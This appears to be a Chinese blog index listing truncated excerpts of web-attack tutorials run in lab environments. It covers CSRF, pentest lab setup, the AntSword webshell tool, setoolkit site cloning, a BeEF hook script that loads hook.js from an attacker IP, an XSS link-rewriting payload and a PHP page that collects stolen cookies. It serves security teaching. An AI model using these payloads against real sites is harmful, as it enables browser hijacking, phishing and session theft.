1.1 CSRF原理 1.1.1 csrf简单理解 假设用户已经保存某网站的登录信息，下次登录不需要认证，此时黑客构造一个访问该站点的链接并添加如：修改密码、转账等操作的参数，用户点击链接后黑客构造的...

1.1 PentesterLab靶场搭建 1.1.1 下载PentesterLab https://pentesterlab.com/exercises 找到相应的漏洞（只有free是免费下载）后进行下载，此处以XXL漏洞为例： 1.1.2 VMware使用ISO文件 下载...

1.1 中国蚁剑 1.1.1 蚁剑介绍 蚁剑(AntSword)是一款开源的跨平台WebShell管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 1.1.2 下载蚁剑 蚁剑源码：https://...

1.1 pikachu靶场搭建 1.1.1 安装LAMP环境 参考《DVWA靶场搭建》1.1.1章节 1.1.2 下载部署pikachu https://github.com/zhuifengshaonianhanlu/pikachu [cce lang='bash'][root@web ~]# cd /var/w...

1.1 持久性XSS窃取用户信息 1.1.1 制作钓鱼网站 使用setoolkit克隆站点，setoolkit是一个万能的社工工具(社会工程学工具集合) [cce lang='bash']# setoolkit Do you agree to the terms of serv...

1.1 使用beef劫持用户浏览器 1.1.1 新建hook并启动apache [cce lang='bash']# vim /var/www/html/beef-xss.html <html> <head> <script src='http://192.168.10.180:3000/hook.j...

1.1 反射型XSS攻击劫持用户浏览器 1.1.1 构造攻击payload [cce lang='bash']<script> window.onload = function() { var link= document.getElementsByTagName('a'); for(j = 0; j < l...

1.1 窃取用户cookie信息保存到远程服务器 1.1.1 构建钓鱼网站接收cookie 页面中创建cookie变量，然后将cookie变量写入cookie.txt [cce lang='bash']# vim /var/www/html/diaoyu.php <?php $c...

1.1 XSS攻击常用编码 1.1.1 URL编码 url的设计者考虑到安全传输问题，防止url字符丢失，所以选用了相对较小的通用的安全字母表。另一方面url的设计者希望url是完整的，有时候需要url中包含除去...

1.1 Stage 13 CSS的IE特性伪协议注入XSS https://xss-quiz.int21h.jp/stage13_0.php?sid=1c9c607c40dc4863f84fe2bd8218c7ba4664721e 1.1.1 页面分析 1.1.1.1 分析过程 提示信息：样式属性 页面...